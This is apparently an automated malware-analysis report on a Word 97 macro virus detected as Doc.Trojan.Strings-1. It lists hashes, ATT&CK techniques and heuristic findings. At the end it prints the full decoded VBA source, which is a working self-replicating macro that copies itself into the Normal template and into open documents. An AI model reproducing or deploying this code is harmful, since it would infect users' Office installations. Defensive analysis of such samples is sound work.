Office (OLE) malware analysis — malicious · 77ef75061091eb24

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-11-12 17:04:00 Authoring application: Microsoft Word 8.0 First seen: 2015-04-05

MD5: 6e8eac3032789eb6d43d7841d51f754f SHA-1: 0284c35b48b999dc9e924cfc0fd1134193e5ce5f SHA-256: 77ef75061091eb246ddb33ebdd54ac568fe11e6386d760eae54a1366e73bf68e

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document containing VBA macros. The 'Document_open' macro is designed to copy its own code into the Normal template and the active document, indicating a self-replication or persistence mechanism. This behavior, combined with ClamAV detections of 'Doc.Trojan.Strings-1', strongly suggests a malicious document designed to spread or maintain its presence.

Heuristics 4

ClamAV: Doc.Trojan.Strings-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Strings-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
.deletelines 1, OCKAJRF.countoflines
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1291 bytes
SHA-256: `1fa96104479d01312eda18495384c60d23567f3fe9a37e19c39bcd7fabd21b1c`
Detection ClamAV: Doc.Trojan.Strings-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True 'e[ax] Private Sub Document_open() Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXU Set CHSJEUR = ThisDocument.VBProject.VBComponents(1).CodeModule Set OCKAJRF = NormalTemplate.VBProject.VBComponents(1).CodeModule Set LCXJSIE = ActiveDocument.VBProject.VBComponents(1).CodeModule KVICKJS = Strings.Trim(CHSJEUR.lines(1, CHSJEUR.countoflines)) SIFDMXU = Strings.LCase("'e[ax]") If SIFDMXU <> OCKAJRF.lines(1, 1) Then With OCKAJRF .deletelines 1, OCKAJRF.countoflines .insertlines 1, KVICKJS End With End If If SIFDMXU <> LCXJSIE.lines(1, 1) Then With LCXJSIE .deletelines 1, LCXJSIE.countoflines .insertlines 1, KVICKJS End With End If 'WM97/2K.String by e[ax] 'SIM v1.0 [String Infection Method] by e[ax] 'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax 'H4dija, te ostale pri BIHnet.ORG-u 'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead, Mist, mort- 'nala, Giga, LifeWire, Fulvian, Evul, and to all ppl on #virus '10x once again for inspiration... 'VicES: Where ar u man!? End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.